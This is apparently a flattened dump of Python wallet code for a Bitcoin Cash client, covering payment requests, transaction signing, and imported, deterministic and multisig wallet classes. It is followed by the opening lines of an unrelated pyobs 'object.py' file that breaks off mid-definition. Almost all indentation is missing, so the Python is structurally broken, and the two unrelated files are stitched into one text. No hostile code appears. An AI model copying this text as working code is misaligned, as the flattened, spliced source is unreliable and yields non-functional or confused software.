return
coins = self.get_addr_utxo(address)
item = coins.get(txid+':%d'%i)
if not item:
return
self.add_input_info(item)
inputs = [item]
outputs = [(TYPE_ADDRESS, address, value - fee)]
locktime = self.get_local_height()
# note: no need to call tx.BIP_LI01_sort() here - single input/output
return Transaction.from_io(inputs, outputs, locktime=locktime, sign_schnorr=sign_schnorr)
def add_input_info(self, txin):
address = txin['address']
if self.is_mine(address):
txin['type'] = self.get_txin_type(address)
# Bitcoin Cash needs value to sign
received, spent = self.get_addr_io(address)
item = received.get(txin['prevout_hash']+':%d'%txin['prevout_n'])
tx_height, value, is_cb = item
txin['value'] = value
self.add_input_sig_info(txin, address)
def can_sign(self, tx):
if tx.is_complete():
return False
for k in self.get_keystores():
# setup "wallet advice" so Xpub wallets know how to sign 'fd' type tx inputs
# by giving them the sequence number ahead of time
if isinstance(k, BIP32_KeyStore):
for txin in tx.inputs():
for x_pubkey in txin['x_pubkeys']:
_, addr = xpubkey_to_address(x_pubkey)
try:
c, index = self.get_address_index(addr)
except:
continue
if index is not None:
k.set_wallet_advice(addr, [c,index])
if k.can_sign(tx):
return True
return False
def get_input_tx(self, tx_hash):
# First look up an input transaction in the wallet where it
# will likely be. If co-signing a transaction it may not have
# all the input txs, in which case we ask the network.
tx = self.transactions.get(tx_hash)
if not tx and self.network:
request = ('blockchain.transaction.get', [tx_hash])
tx = Transaction(self.network.synchronous_get(request))
return tx
def add_input_values_to_tx(self, tx):
""" add input values to the tx, for signing"""
for txin in tx.inputs():
if 'value' not in txin:
inputtx = self.get_input_tx(txin['prevout_hash'])
if inputtx is not None:
out_zero, out_addr, out_val = inputtx.outputs()[txin['prevout_n']]
txin['value'] = out_val
txin['prev_tx'] = inputtx # may be needed by hardware wallets
def add_hw_info(self, tx):
# add previous tx for hw wallets, if needed and not already there
if any([(isinstance(k, Hardware_KeyStore) and k.can_sign(tx) and k.needs_prevtx()) for k in self.get_keystores()]):
for txin in tx.inputs():
if 'prev_tx' not in txin:
txin['prev_tx'] = self.get_input_tx(txin['prevout_hash'])
# add output info for hw wallets
info = {}
xpubs = self.get_master_public_keys()
for txout in tx.outputs():
_type, addr, amount = txout
if self.is_change(addr):
index = self.get_address_index(addr)
pubkeys = self.get_public_keys(addr)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
info[addr] = index, sorted_xpubs, self.m if isinstance(self, Multisig_Wallet) else None, self.txin_type
tx.output_info = info
def sign_transaction(self, tx, password, *, use_cache=False):
""" Sign a transaction, requires password (may be None for password-less
wallets). If `use_cache` is enabled then signing will be much faster.
For transactions with N inputs and M outputs, calculating all sighashes
takes only O(N + M) with the cache, as opposed to O(N^2 + NM) without
the cache.
Warning: If you modify non-signature parts of the transaction
afterwards, do not use `use_cache`! """
if self.is_watching_only():
return
# add input values for signing
self.add_input_values_to_tx(tx)
# hardware wallets require extra info
if any([(isinstance(k, Hardware_KeyStore) and k.can_sign(tx)) for k in self.get_keystores()]):
self.add_hw_info(tx)
# sign
for k in self.get_keystores():
try:
if k.can_sign(tx):
k.sign_transaction(tx, password, use_cache=use_cache)
except UserCancelled:
continue
def get_unused_addresses(self, *, for_change=False, frozen_ok=True):
# fixme: use slots from expired requests
with self.lock:
domain = self.get_receiving_addresses() if not for_change else (self.get_change_addresses() or self.get_receiving_addresses())
return [addr for addr in domain
if not self.get_address_history(addr)
and addr not in self.receive_requests
and (frozen_ok or addr not in self.frozen_addresses)]
def get_unused_address(self, *, for_change=False, frozen_ok=True):
addrs = self.get_unused_addresses(for_change=for_change, frozen_ok=frozen_ok)
if addrs:
return addrs[0]
def get_receiving_address(self, *, frozen_ok=True):
'''Returns a receiving address or None.'''
domain = self.get_unused_addresses(frozen_ok=frozen_ok)
if not domain:
domain = [a for a in self.get_receiving_addresses()
if frozen_ok or a not in self.frozen_addresses]
if domain:
return domain[0]
def get_payment_status(self, address, amount):
local_height = self.get_local_height()
received, sent = self.get_addr_io(address)
l = []
for txo, x in received.items():
h, v, is_cb = x
txid, n = txo.split(':')
info = self.verified_tx.get(txid)
if info:
tx_height, timestamp, pos = info
conf = local_height - tx_height
else:
conf = 0
l.append((conf, v))
vsum = 0
for conf, v in reversed(sorted(l)):
vsum += v
if vsum >= amount:
return True, conf
return False, None
def has_payment_request(self, addr):
''' Returns True iff Address addr has any extant payment requests
(even if expired), False otherwise. '''
assert isinstance(addr, Address)
return bool(self.receive_requests.get(addr))
def get_payment_request(self, addr, config):
assert isinstance(addr, Address)
r = self.receive_requests.get(addr)
if not r:
return
out = copy.copy(r)
addr_text = addr.to_ui_string()
amount_text = format_satoshis(r['amount'])
out['URI'] = '{}:{}?amount={}'.format(networks.net.CASHADDR_PREFIX,
addr_text, amount_text)
status, conf = self.get_request_status(addr)
out['status'] = status
if conf is not None:
out['confirmations'] = conf
# check if bip70 file exists
rdir = config.get('requests_dir')
if rdir:
key = out.get('id', addr.to_storage_string())
path = os.path.join(rdir, 'req', key[0], key[1], key)
if os.path.exists(path):
baseurl = 'file://' + rdir
rewrite = config.get('url_rewrite')
if rewrite:
baseurl = baseurl.replace(*rewrite)
out['request_url'] = os.path.join(baseurl, 'req', key[0], key[1], key, key)
out['URI'] += '&r=' + out['request_url']
if not 'index_url' in out:
out['index_url'] = os.path.join(baseurl, 'index.html') + '?id=' + key
websocket_server_announce = config.get('websocket_server_announce')
if websocket_server_announce:
out['websocket_server'] = websocket_server_announce
else:
out['websocket_server'] = config.get('websocket_server', 'localhost')
websocket_port_announce = config.get('websocket_port_announce')
if websocket_port_announce:
out['websocket_port'] = websocket_port_announce
else:
out['websocket_port'] = config.get('websocket_port', 9999)
return out
def get_request_status(self, key):
r = self.receive_requests.get(key)
if r is None:
return PR_UNKNOWN
address = r['address']
amount = r.get('amount')
timestamp = r.get('time', 0)
if timestamp and type(timestamp) != int:
timestamp = 0
expiration = r.get('exp')
if expiration and type(expiration) != int:
expiration = 0
conf = None
if amount:
paid, conf = self.get_payment_status(address, amount)
status = PR_PAID if paid else PR_UNPAID
if status == PR_UNPAID and expiration is not None and time.time() > timestamp + expiration:
status = PR_EXPIRED
else:
status = PR_UNKNOWN
return status, conf
def make_payment_request(self, addr, amount, message, expiration=None, *,
op_return=None, op_return_raw=None, payment_url=None, index_url=None):
assert isinstance(addr, Address)
if op_return and op_return_raw:
raise ValueError("both op_return and op_return_raw cannot be specified as arguments to make_payment_request")
timestamp = int(time.time())
_id = bh2u(Hash(addr.to_storage_string() + "%d" % timestamp))[0:10]
d = {
'time': timestamp,
'amount': amount,
'exp': expiration,
'address': addr,
'memo': message,
'id': _id
}
if payment_url:
d['payment_url'] = payment_url + "/" + _id
if index_url:
d['index_url'] = index_url + "/" + _id
if op_return:
d['op_return'] = op_return
if op_return_raw:
d['op_return_raw'] = op_return_raw
return d
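    # Sketch of the payment-request flow (illustrative; `wallet`, `config`, `addr`
    # and `amount_sats` are assumed to be provided by the caller):
    #
    #   req = wallet.make_payment_request(addr, amount_sats, "example memo", expiration=3600)
    #   wallet.add_payment_request(req, config)
    #   status, conf = wallet.get_request_status(addr)   # PR_UNPAID / PR_PAID / PR_EXPIRED / PR_UNKNOWN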
def serialize_request(self, r):
result = r.copy()
result['address'] = r['address'].to_storage_string()
return result
def save_payment_requests(self):
def delete_address(value):
del value['address']
return value
requests = {addr.to_storage_string() : delete_address(value.copy())
for addr, value in self.receive_requests.items()}
self.storage.put('payment_requests', requests)
self.storage.write()
def sign_payment_request(self, key, alias, alias_addr, password):
req = self.receive_requests.get(key)
alias_privkey = self.export_private_key(alias_addr, password)
pr = paymentrequest.make_unsigned_request(req)
paymentrequest.sign_request_with_alias(pr, alias, alias_privkey)
req['name'] = to_string(pr.pki_data)
req['sig'] = bh2u(pr.signature)
self.receive_requests[key] = req
self.save_payment_requests()
def add_payment_request(self, req, config, set_address_label=True):
addr = req['address']
addr_text = addr.to_storage_string()
amount = req['amount']
message = req['memo']
self.receive_requests[addr] = req
self.save_payment_requests()
if set_address_label:
self.set_label(addr_text, message) # should be a default label
rdir = config.get('requests_dir')
if rdir and amount is not None:
key = req.get('id', addr_text)
pr = paymentrequest.make_request(config, req)
path = os.path.join(rdir, 'req', key[0], key[1], key)
if not os.path.exists(path):
try:
os.makedirs(path)
except OSError as exc:
if exc.errno != errno.EEXIST:
raise
with open(os.path.join(path, key), 'wb') as f:
f.write(pr.SerializeToString())
# reload
req = self.get_payment_request(addr, config)
req['address'] = req['address'].to_ui_string()
with open(os.path.join(path, key + '.json'), 'w', encoding='utf-8') as f:
f.write(json.dumps(req))
def remove_payment_request(self, addr, config, clear_address_label_if_no_tx=True):
if isinstance(addr, str):
addr = Address.from_string(addr)
if addr not in self.receive_requests:
return False
r = self.receive_requests.pop(addr)
if clear_address_label_if_no_tx and not self.get_address_history(addr):
memo = r.get('memo')
# clear it only if the user didn't overwrite it with something else
if memo and memo == self.labels.get(addr.to_storage_string()):
self.set_label(addr, None)
rdir = config.get('requests_dir')
if rdir:
key = r.get('id', addr.to_storage_string())
for s in ['.json', '']:
n = os.path.join(rdir, 'req', key[0], key[1], key, key + s)
if os.path.exists(n):
os.unlink(n)
self.save_payment_requests()
return True
def get_sorted_requests(self, config):
m = map(lambda x: self.get_payment_request(x, config), self.receive_requests.keys())
try:
def f(x):
try:
addr = x['address']
return self.get_address_index(addr) or addr
except:
return addr
return sorted(m, key=f)
except TypeError:
            # See issue #1231 -- can get inhomogeneous results in the above
# sorting function due to the 'or addr' possible return.
# This can happen if addresses for some reason drop out of wallet
# while, say, the history rescan is running and it can't yet find
# an address index for an address. In that case we will
# return an unsorted list to the caller.
return list(m)
def get_fingerprint(self):
raise NotImplementedError()
def can_import_privkey(self):
return False
def can_import_address(self):
return False
def can_delete_address(self):
return False
def is_multisig(self):
# Subclass Multisig_Wallet overrides this
return False
def is_hardware(self):
return any([isinstance(k, Hardware_KeyStore) for k in self.get_keystores()])
def add_address(self, address):
assert isinstance(address, Address)
self._addr_bal_cache.pop(address, None) # paranoia, not really necessary -- just want to maintain the invariant that when we modify address history below we invalidate cache.
self.invalidate_address_set_cache()
if address not in self._history:
self._history[address] = []
if self.synchronizer:
self.synchronizer.add(address)
self.cashacct.on_address_addition(address)
def has_password(self):
return self.storage.get('use_encryption', False)
def check_password(self, password):
self.keystore.check_password(password)
def sign_message(self, address, message, password):
index = self.get_address_index(address)
return self.keystore.sign_message(index, message, password)
def decrypt_message(self, pubkey, message, password):
addr = self.pubkeys_to_address(pubkey)
index = self.get_address_index(addr)
return self.keystore.decrypt_message(index, message, password)
def rebuild_history(self):
''' This is an advanced function for use in the GUI when the user
wants to resynch the whole wallet from scratch, preserving labels
and contacts. '''
if not self.network or not self.network.is_connected():
raise RuntimeError('Refusing to rebuild wallet without a valid server connection!')
if not self.synchronizer or not self.verifier:
raise RuntimeError('Refusing to rebuild a stopped wallet!')
network = self.network
self.stop_threads()
do_addr_save = False
with self.lock:
self.transactions.clear(); self.unverified_tx.clear(); self.verified_tx.clear()
self.clear_history()
if isinstance(self, Standard_Wallet):
# reset the address list to default too, just in case. New synchronizer will pick up the addresses again.
self.receiving_addresses, self.change_addresses = self.receiving_addresses[:self.gap_limit], self.change_addresses[:self.gap_limit_for_change]
do_addr_save = True
self.change_reserved.clear()
self.change_reserved_default.clear()
self.change_unreserved.clear()
self.change_reserved_tmp.clear()
self.invalidate_address_set_cache()
if do_addr_save:
self.save_addresses()
self.save_transactions()
self.save_change_reservations()
self.save_verified_tx() # implicit cashacct.save
self.storage.write()
self.start_threads(network)
self.network.trigger_callback('wallet_updated', self)
def is_schnorr_possible(self, reason: list = None) -> bool:
''' Returns True if this wallet type is compatible.
`reason` is an optional list where you would like a translated string
of why Schnorr isn't possible placed (on False return). '''
ok = bool(not self.is_multisig() and not self.is_hardware())
if not ok and isinstance(reason, list):
reason.insert(0, _('Schnorr signatures are disabled for this wallet type.'))
return ok
def is_schnorr_enabled(self) -> bool:
''' Returns whether schnorr is enabled AND possible for this wallet.
Schnorr is enabled per-wallet. '''
if not self.is_schnorr_possible():
# Short-circuit out of here -- it's not even possible with this
# wallet type.
return False
ss_cfg = self.storage.get('sign_schnorr', None)
if ss_cfg is None:
# Schnorr was not set in config; figure out intelligent defaults,
# preferring Schnorr if it's at least as fast as ECDSA (based on
# which libs user has installed). Note for watching-only we default
# to off if unspecified regardless, to not break compatibility
# with air-gapped signing systems that have older EC installed
# on the signing system. This is to avoid underpaying fees if
# signing system doesn't use Schnorr. We can turn on default
# Schnorr on watching-only sometime in the future after enough
# time has passed that air-gapped systems are unlikely to not
# have Schnorr enabled by default.
# TO DO: Finish refactor of txn serialized format to handle this
# case better!
if (not self.is_watching_only()
and (schnorr.has_fast_sign()
or not ecc_fast.is_using_fast_ecc())):
# Prefer Schnorr, all things being equal.
# - If not watching-only & schnorr possible AND
# - Either Schnorr is fast sign (native, ABC's secp256k1),
# so use it by default
# - Or both ECDSA & Schnorr are slow (non-native);
# so use Schnorr in that case as well
ss_cfg = 2
else:
# This branch is reached if Schnorr is slow but ECDSA is fast
# (core's secp256k1 lib was found which lacks Schnorr) -- so we
# default it to off. Also if watching only we default off.
ss_cfg = 0
return bool(ss_cfg)
def set_schnorr_enabled(self, b: bool):
        ''' Enable schnorr for this wallet. Note that if Schnorr is not possible
        (due to missing libs or an unsupported wallet type), is_schnorr_enabled()
        will still return False even after calling this function with a True argument. '''
# Note: we will have '1' at some point in the future which will mean:
# 'ask me per tx', so for now True -> 2.
self.storage.put('sign_schnorr', 2 if b else 0)
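    # Sketch: querying and toggling Schnorr signing on a wallet (illustrative;
    # `wallet` is assumed to be an instance of an Abstract_Wallet subclass):
    #
    #   reasons = []
    #   if wallet.is_schnorr_possible(reasons):
    #       wallet.set_schnorr_enabled(True)
    #   print(wallet.is_schnorr_enabled(), reasons)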
class Simple_Wallet(Abstract_Wallet):
# wallet with a single keystore
def get_keystore(self):
return self.keystore
def get_keystores(self):
return [self.keystore]
def is_watching_only(self):
return self.keystore.is_watching_only()
def can_change_password(self):
return self.keystore.can_change_password()
def update_password(self, old_pw, new_pw, encrypt=False):
if old_pw is None and self.has_password():
raise InvalidPassword()
if self.keystore is not None and self.keystore.can_change_password():
self.keystore.update_password(old_pw, new_pw)
self.save_keystore()
self.storage.set_password(new_pw, encrypt)
self.storage.write()
def save_keystore(self):
self.storage.put('keystore', self.keystore.dump())
class ImportedWalletBase(Simple_Wallet):
txin_type = 'p2pkh'
def get_txin_type(self, address):
return self.txin_type
def can_delete_address(self):
return len(self.get_addresses()) > 1 # Cannot delete the last address
def has_seed(self):
return False
def is_deterministic(self):
return False
def is_change(self, address):
return False
def get_master_public_keys(self):
return []
def is_beyond_limit(self, address, is_change):
return False
def get_fingerprint(self):
return ''
def get_receiving_addresses(self):
return self.get_addresses()
def delete_address(self, address):
assert isinstance(address, Address)
all_addrs = self.get_addresses()
if len(all_addrs) <= 1 or address not in all_addrs:
return
del all_addrs
transactions_to_remove = set() # only referred to by this address
transactions_new = set() # txs that are not only referred to by address
with self.lock:
for addr, details in self._history.items():
if addr == address:
for tx_hash, height in details:
transactions_to_remove.add(tx_hash)
self.tx_addr_hist[tx_hash].discard(address)
if not self.tx_addr_hist.get(tx_hash):
self.tx_addr_hist.pop(tx_hash, None)
else:
for tx_hash, height in details:
transactions_new.add(tx_hash)
transactions_to_remove -= transactions_new
self._history.pop(address, None)
for tx_hash in transactions_to_remove:
self.remove_transaction(tx_hash)
self.tx_fees.pop(tx_hash, None)
self.verified_tx.pop(tx_hash, None)
self.unverified_tx.pop(tx_hash, None)
self.transactions.pop(tx_hash, None)
self._addr_bal_cache.pop(address, None) # not strictly necessary, above calls also have this side-effect. but here to be safe. :)
if self.verifier:
# TX is now gone. Toss its SPV proof in case we have it
# in memory. This allows user to re-add PK again and it
# will avoid the situation where the UI says "not verified"
# erroneously!
self.verifier.remove_spv_proof_for_tx(tx_hash)
# FIXME: what about pruned_txo?
self.storage.put('verified_tx3', self.verified_tx)
self.save_transactions()
self.set_label(address, None)
self.remove_payment_request(address, {})
self.set_frozen_state([address], False)
self.delete_address_derived(address)
self.cashacct.on_address_deletion(address)
self.cashacct.save()
self.save_addresses()
self.storage.write() # no-op if above already wrote
class ImportedAddressWallet(ImportedWalletBase):
# Watch-only wallet of imported addresses
wallet_type = 'imported_addr'
def __init__(self, storage):
self._sorted = None
super().__init__(storage)
@classmethod
def from_text(cls, storage, text):
wallet = cls(storage)
for address in text.split():
wallet.import_address(Address.from_string(address))
return wallet
def is_watching_only(self):
return True
def get_keystores(self):
return []
def can_import_privkey(self):
return False
def load_keystore(self):
self.keystore = None
def save_keystore(self):
pass
def load_addresses(self):
addresses = self.storage.get('addresses', [])
self.addresses = [Address.from_string(addr) for addr in addresses]
def save_addresses(self):
self.storage.put('addresses', [addr.to_storage_string()
for addr in self.addresses])
self.storage.write()
def can_change_password(self):
return False
def can_import_address(self):
return True
def get_addresses(self, include_change=False):
if not self._sorted:
self._sorted = sorted(self.addresses,
key=lambda addr: addr.to_ui_string())
return self._sorted
def import_address(self, address):
assert isinstance(address, Address)
if address in self.addresses:
return False
self.addresses.append(address)
self.add_address(address)
self.cashacct.save()
self.save_addresses()
self.storage.write() # no-op if already wrote in previous call
self._sorted = None
return True
def delete_address_derived(self, address):
self.addresses.remove(address)
self._sorted.remove(address)
def add_input_sig_info(self, txin, address):
x_pubkey = 'fd' + address.to_script_hex()
txin['x_pubkeys'] = [x_pubkey]
txin['signatures'] = [None]
class ImportedPrivkeyWallet(ImportedWalletBase):
# wallet made of imported private keys
wallet_type = 'imported_privkey'
def __init__(self, storage):
Abstract_Wallet.__init__(self, storage)
@classmethod
def from_text(cls, storage, text, password=None):
wallet = cls(storage)
storage.put('use_encryption', bool(password))
for privkey in text.split():
wallet.import_private_key(privkey, password)
return wallet
def is_watching_only(self):
return False
def get_keystores(self):
return [self.keystore]
def can_import_privkey(self):
return True
def load_keystore(self):
if self.storage.get('keystore'):
self.keystore = load_keystore(self.storage, 'keystore')
else:
self.keystore = Imported_KeyStore({})
def save_keystore(self):
self.storage.put('keystore', self.keystore.dump())
def load_addresses(self):
pass
def save_addresses(self):
pass
def can_change_password(self):
return True
def can_import_address(self):
return False
def get_addresses(self, include_change=False):
return self.keystore.get_addresses()
def delete_address_derived(self, address):
self.keystore.remove_address(address)
self.save_keystore()
def get_address_index(self, address):
return self.get_public_key(address)
def get_public_key(self, address):
return self.keystore.address_to_pubkey(address)
def import_private_key(self, sec, pw):
pubkey = self.keystore.import_privkey(sec, pw)
self.save_keystore()
self.add_address(pubkey.address)
self.cashacct.save()
self.save_addresses()
self.storage.write() # no-op if above already wrote
return pubkey.address.to_ui_string()
def export_private_key(self, address, password):
'''Returned in WIF format.'''
pubkey = self.keystore.address_to_pubkey(address)
return self.keystore.export_private_key(pubkey, password)
def add_input_sig_info(self, txin, address):
assert txin['type'] == 'p2pkh'
pubkey = self.keystore.address_to_pubkey(address)
txin['num_sig'] = 1
txin['x_pubkeys'] = [pubkey.to_ui_string()]
txin['signatures'] = [None]
def pubkeys_to_address(self, pubkey):
pubkey = PublicKey.from_string(pubkey)
if pubkey in self.keystore.keypairs:
return pubkey.address
class Deterministic_Wallet(Abstract_Wallet):
def __init__(self, storage):
Abstract_Wallet.__init__(self, storage)
self.gap_limit = storage.get('gap_limit', 20)
def has_seed(self):
return self.keystore.has_seed()
def get_receiving_addresses(self):
return self.receiving_addresses
def get_change_addresses(self):
return self.change_addresses
def get_seed(self, password):
return self.keystore.get_seed(password)
def add_seed(self, seed, pw):
self.keystore.add_seed(seed, pw)
def change_gap_limit(self, value):
'''This method is not called in the code, it is kept for console use'''
with self.lock:
if value >= self.gap_limit:
self.gap_limit = value
self.storage.put('gap_limit', self.gap_limit)
return True
elif value >= self.min_acceptable_gap():
addresses = self.get_receiving_addresses()
k = self.num_unused_trailing_addresses(addresses)
n = len(addresses) - k + value
self.receiving_addresses = self.receiving_addresses[0:n]
self.gap_limit = value
self.storage.put('gap_limit', self.gap_limit)
self.save_addresses()
return True
else:
return False
def num_unused_trailing_addresses(self, addresses):
'''This method isn't called anywhere. Perhaps it is here for console use.
Can't be sure. -Calin '''
with self.lock:
k = 0
for addr in reversed(addresses):
if addr in self._history:
break
k = k + 1
return k
def min_acceptable_gap(self):
''' Caller needs to hold self.lock otherwise bad things may happen. '''
# fixme: this assumes wallet is synchronized
n = 0
nmax = 0
addresses = self.get_receiving_addresses()
k = self.num_unused_trailing_addresses(addresses)
for a in addresses[0:-k]:
if a in self._history:
n = 0
else:
n += 1
if n > nmax: nmax = n
return nmax + 1
def create_new_address(self, for_change=False):
for_change = bool(for_change)
with self.lock:
addr_list = self.change_addresses if for_change else self.receiving_addresses
n = len(addr_list)
x = self.derive_pubkeys(for_change, n)
address = self.pubkeys_to_address(x)
addr_list.append(address)
self.save_addresses()
self.add_address(address)
return address
def synchronize_sequence(self, for_change):
limit = self.gap_limit_for_change if for_change else self.gap_limit
while True:
addresses = self.get_change_addresses() if for_change else self.get_receiving_addresses()
if len(addresses) < limit:
self.create_new_address(for_change)
continue
if all(map(lambda a: not self.address_is_old(a), addresses[-limit:] )):
break
else:
self.create_new_address(for_change)
def synchronize(self):
with self.lock:
self.synchronize_sequence(False)
self.synchronize_sequence(True)
def is_beyond_limit(self, address, is_change):
with self.lock:
if is_change:
addr_list = self.get_change_addresses()
limit = self.gap_limit_for_change
else:
addr_list = self.get_receiving_addresses()
limit = self.gap_limit
idx = addr_list.index(address)
if idx < limit:
return False
for addr in addr_list[-limit:]:
if addr in self._history:
return False
return True
def get_master_public_keys(self):
return [self.get_master_public_key()]
def get_fingerprint(self):
return self.get_master_public_key()
def get_txin_type(self, address):
return self.txin_type
class Simple_Deterministic_Wallet(Simple_Wallet, Deterministic_Wallet):
""" Deterministic Wallet with a single pubkey per address """
def __init__(self, storage):
Deterministic_Wallet.__init__(self, storage)
def get_public_key(self, address):
sequence = self.get_address_index(address)
pubkey = self.get_pubkey(*sequence)
return pubkey
def load_keystore(self):
self.keystore = load_keystore(self.storage, 'keystore')
try:
xtype = bitcoin.xpub_type(self.keystore.xpub)
except:
xtype = 'standard'
self.txin_type = 'p2pkh' if xtype == 'standard' else xtype
def get_pubkey(self, c, i):
return self.derive_pubkeys(c, i)
def get_public_keys(self, address):
return [self.get_public_key(address)]
def add_input_sig_info(self, txin, address):
derivation = self.get_address_index(address)
x_pubkey = self.keystore.get_xpubkey(*derivation)
txin['x_pubkeys'] = [x_pubkey]
txin['signatures'] = [None]
txin['num_sig'] = 1
def get_master_public_key(self):
return self.keystore.get_master_public_key()
def derive_pubkeys(self, c, i):
return self.keystore.derive_pubkey(c, i)
class Standard_Wallet(Simple_Deterministic_Wallet):
wallet_type = 'standard'
def pubkeys_to_address(self, pubkey):
return Address.from_pubkey(pubkey)
class Multisig_Wallet(Deterministic_Wallet):
# generic m of n
gap_limit = 20
def __init__(self, storage):
self.wallet_type = storage.get('wallet_type')
self.m, self.n = multisig_type(self.wallet_type)
Deterministic_Wallet.__init__(self, storage)
def get_pubkeys(self, c, i):
return self.derive_pubkeys(c, i)
def pubkeys_to_address(self, pubkeys):
pubkeys = [bytes.fromhex(pubkey) for pubkey in pubkeys]
redeem_script = self.pubkeys_to_redeem_script(pubkeys)
return Address.from_multisig_script(redeem_script)
def pubkeys_to_redeem_script(self, pubkeys):
return Script.multisig_script(self.m, sorted(pubkeys))
def derive_pubkeys(self, c, i):
return [k.derive_pubkey(c, i) for k in self.get_keystores()]
def load_keystore(self):
self.keystores = {}
for i in range(self.n):
name = 'x%d/'%(i+1)
self.keystores[name] = load_keystore(self.storage, name)
self.keystore = self.keystores['x1/']
xtype = bitcoin.xpub_type(self.keystore.xpub)
self.txin_type = 'p2sh' if xtype == 'standard' else xtype
def save_keystore(self):
for name, k in self.keystores.items():
self.storage.put(name, k.dump())
def get_keystore(self):
return self.keystores.get('x1/')
def get_keystores(self):
return [self.keystores[i] for i in sorted(self.keystores.keys())]
def update_password(self, old_pw, new_pw, encrypt=False):
if old_pw is None and self.has_password():
raise InvalidPassword()
for name, keystore in self.keystores.items():
if keystore.can_change_password():
keystore.update_password(old_pw, new_pw)
self.storage.put(name, keystore.dump())
self.storage.set_password(new_pw, encrypt)
self.storage.write()
def has_seed(self):
return self.keystore.has_seed()
def can_change_password(self):
return self.keystore.can_change_password()
def is_watching_only(self):
        return all(k.is_watching_only() for k in self.get_keystores())
def get_master_public_key(self):
return self.keystore.get_master_public_key()
def get_master_public_keys(self):
return [k.get_master_public_key() for k in self.get_keystores()]
def get_fingerprint(self):
return ''.join(sorted(self.get_master_public_keys()))
def add_input_sig_info(self, txin, address):
# x_pubkeys are not sorted here because it would be too slow
# they are sorted in transaction.get_sorted_pubkeys
derivation = self.get_address_index(address)
txin['x_pubkeys'] = [k.get_xpubkey(*derivation) for k in self.get_keystores()]
txin['pubkeys'] = None
# we need n place holders
txin['signatures'] = [None] * self.n
txin['num_sig'] = self.m
def is_multisig(self):
return True
wallet_types = ['standard', 'multisig', 'imported']
def register_wallet_type(category):
wallet_types.append(category)
wallet_constructors = {
'standard': Standard_Wallet,
'old': Standard_Wallet,
'xpub': Standard_Wallet,
'imported_privkey': ImportedPrivkeyWallet,
'imported_addr': ImportedAddressWallet,
}
def register_constructor(wallet_type, constructor):
wallet_constructors[wallet_type] = constructor
class UnknownWalletType(RuntimeError):
''' Raised if encountering an unknown wallet type '''
pass
# former WalletFactory
class Wallet:
"""The main wallet "entry point".
This class is actually a factory that will return a wallet of the correct
type when passed a WalletStorage instance."""
def __new__(self, storage):
wallet_type = storage.get('wallet_type')
WalletClass = Wallet.wallet_class(wallet_type)
wallet = WalletClass(storage)
# Convert hardware wallets restored with older versions of
# Electrum to BIP44 wallets. A hardware wallet does not have
# a seed and plugins do not need to handle having one.
rwc = getattr(wallet, 'restore_wallet_class', None)
if rwc and storage.get('seed', ''):
storage.print_error("converting wallet type to " + rwc.wallet_type)
storage.put('wallet_type', rwc.wallet_type)
wallet = rwc(storage)
return wallet
@staticmethod
def wallet_class(wallet_type):
if multisig_type(wallet_type):
return Multisig_Wallet
if wallet_type in wallet_constructors:
return wallet_constructors[wallet_type]
raise UnknownWalletType("Unknown wallet type: " + str(wallet_type))
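# Sketch of the factory in use (illustrative; `path` is a placeholder wallet file
# and `network` an assumed running Network instance, neither is defined here):
#
#   storage = WalletStorage(path)
#   wallet = Wallet(storage)          # returns e.g. Standard_Wallet or Multisig_Wallet
#   wallet.start_threads(network)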
def create_new_wallet(*, path, config, passphrase=None, password=None,
encrypt_file=True, seed_type=None, gap_limit=None) -> dict:
"""Create a new wallet"""
storage = WalletStorage(path)
if storage.file_exists():
raise Exception("Remove the existing wallet first!")
from .mnemonic import Mnemonic_Electrum, Mnemonic
if seed_type == 'electrum':
seed = Mnemonic_Electrum('en').make_seed()
else:
seed = Mnemonic('en').make_seed()
k = keystore.from_seed(seed, passphrase, seed_type = seed_type)
storage.put('keystore', k.dump())
storage.put('wallet_type', 'standard')
storage.put('seed_type', seed_type)
if gap_limit is not None:
storage.put('gap_limit', gap_limit)
wallet = Wallet(storage)
wallet.update_password(old_pw=None, new_pw=password, encrypt=encrypt_file)
wallet.synchronize()
msg = "Please keep your seed in a safe place; if you lose it, you will not be able to restore your wallet."
wallet.storage.write()
return {'seed': seed, 'wallet': wallet, 'msg': msg}
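# A hedged usage sketch for create_new_wallet() above (illustrative only; the
# path and config object are placeholders supplied by the caller):
#
#   d = create_new_wallet(path='/tmp/new_wallet', config=config,
#                         password='pw', seed_type='electrum')
#   print(d['seed'])          # back this up!
#   wallet = d['wallet']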
def restore_wallet_from_text(text, *, path, config,
passphrase=None, password=None, encrypt_file=True,
gap_limit=None) -> dict:
"""Restore a wallet from text. Text can be a seed phrase, a master
public key, a master private key, a list of bitcoin addresses
or bitcoin private keys."""
storage = WalletStorage(path)
if storage.file_exists():
raise Exception("Remove the existing wallet first!")
text = text.strip()
if keystore.is_address_list(text):
wallet = ImportedAddressWallet.from_text(storage, text)
wallet.save_addresses()
elif keystore.is_private_key_list(text,):
k = keystore.Imported_KeyStore({})
storage.put('keystore', k.dump())
wallet = ImportedPrivkeyWallet.from_text(storage, text, password)
else:
if keystore.is_master_key(text):
k = keystore.from_master_key(text)
elif keystore.is_seed(text):
k = keystore.from_seed(text, passphrase) # auto-detects seed type, preference order: old, electrum, bip39
else:
raise Exception("Seed or key not recognized")
storage.put('keystore', k.dump())
storage.put('wallet_type', 'standard')
seed_type = getattr(k, 'seed_type', None)
if seed_type:
storage.put('seed_type', seed_type) # Save, just in case
if gap_limit is not None:
storage.put('gap_limit', gap_limit)
wallet = Wallet(storage)
wallet.update_password(old_pw=None, new_pw=password, encrypt=encrypt_file)
wallet.synchronize()
msg = ("This wallet was restored offline. It may contain more addresses than displayed. "
"Start a daemon and use load_wallet to sync its history.")
wallet.storage.write()
return {'wallet': wallet, 'msg': msg}
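# Similarly, restoring from text (illustrative; the seed phrase shown is a
# placeholder, not a real wallet seed):
#
#   d = restore_wallet_from_text('word1 word2 ... word12',
#                                path='/tmp/restored_wallet', config=config)
#   wallet = d['wallet']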
|
object.py
|
"""
:class:`~pyobs.object.Object` is the base for almost all classes in *pyobs*. It adds some convenience methods
and helper methods for creating other Objects.
:func:`~pyobs.object.get_object` is a convenience function for creating objects from dictionaries.
"""
from __future__ import annotations
import datetime
import threading
from typing import Union, Callable, TypeVar, Optional, Type, List, Tuple, Dict
import logging
import pytz
from astroplan import Observer
from astropy.coordinates import EarthLocation
import pyobs
log = logging.getLogger(__name__)
"""Class of an Object."""
ObjectClass = TypeVar('ObjectClass')
def get_object(config_or_object: Union[dict, object], object_class: Type[ObjectClass] = None, *args, **kwargs) \
